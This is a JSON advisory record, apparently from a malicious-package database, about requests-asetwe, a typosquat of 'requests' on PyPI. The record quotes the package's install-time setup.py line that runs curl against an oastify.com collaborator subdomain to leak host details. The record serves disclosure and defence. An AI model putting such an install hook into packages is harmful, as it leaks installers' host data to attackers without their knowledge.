{"id":"MAL-2026-16269","summary":"Malicious code in requests-asetwe (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5)\nsetup.py of requests-asetwe unconditionally executes `os.system('curl -s https://w5223hr2yr968bhwql8bv5n8ozuqih66.oastify.com')` during `pip install`. The destination is a Burp Collaborator (oastify.com) subdomain — an out-of-band interaction service used to confirm code execution and collect the victim's IP/DNS metadata on the attacker's collaborator instance. The package name is a lookalike of the widely-used `requests` package, and the shipped setup.py has no legitimate reason to contact an anonymous oastify subdomain at install time. Installing the package causes the installer's host to beacon to attacker-controlled infrastructure automatically.\n\n## Source: kam193 (7078a9b4fc2be32cbeb1f2c20ec67834c8e293bd410ceeb4842cacd8340d9835)\nInstalling the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.\n\n\nCampaign: GENERIC-standard-pypi-install-pentest\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n","modified":"2026-09-18T01:00:06.121348690Z","published":"2026-09-17T22:07:36Z","database_specific":{"malicious-packages-origins":[{"id":"pypi/GENERIC-standard-pypi-install-pentest/requests-asetwe","import_time":"2026-09-17T22:37:46.31209001Z","modified_time":"2026-09-17T22:07:36.431853Z","sha256":"7078a9b4fc2be32cbeb1f2c20ec67834c8e293bd410ceeb4842cacd8340d9835","source":"kam193","versions":["2.34.2"]},{"source":"amazon-inspector","versions":["2.34.2"],"id":"IN-MAL-2026-020155","import_time":"2026-09-18T00:47:16.041472144Z","modified_time":"2026-09-17T23:16:48Z","sha256":"c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5"}]},"references":[{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/requests-asetwe"},{"type":"PACKAGE","url":"https://pypi.org/project/requests-asetwe/2.34.2/"}],"affected":[{"package":{"name":"requests-asetwe","ecosystem":"PyPI","purl":"pkg:pypi/requests-asetwe"},"versions":["2.34.2"],"database_specific":{"indicators":{"evidence_files":[{"path":"setup.py","sha256":"5d83e8eb0ff797bc5db6c0dcf81d313e113cb4975750b2abb1b20a9a7fedf8c6","tlsh":"c9d095574723703b66d741eda54645335633d4610f4194dddbcd071467820360725c71"}],"package_integrity":[{"filename":"requests_asetwe-2.34.2-py3-none-any.whl","hashes":{"blake2b_256":"4b0e1742d708c4743f6317d353d224c8868b7cf364d3f25f2726deca2498850e","md5":"a01d1ed94023e03ab4e7aba8164f395d","sha256":"6bbcc26828a3966e5e6deabfcac153619801b500b102dce95dab000ee1864fb6"}},{"hashes":{"md5":"1250dec2b3077955219d0d2b8d4afcf2","sha256":"6b1867501a54c87dd5cdcdd8c9d4cbb4a15e29d5172704019fa34b6095c83a6d","blake2b_256":"ecc482d1b2341ea942f29ba45a830d5cd161bf9644390fada34579a88ce5e050"},"filename":"requests_asetwe-2.34.2.tar.gz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/requests-asetwe/MAL-2026-16269.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}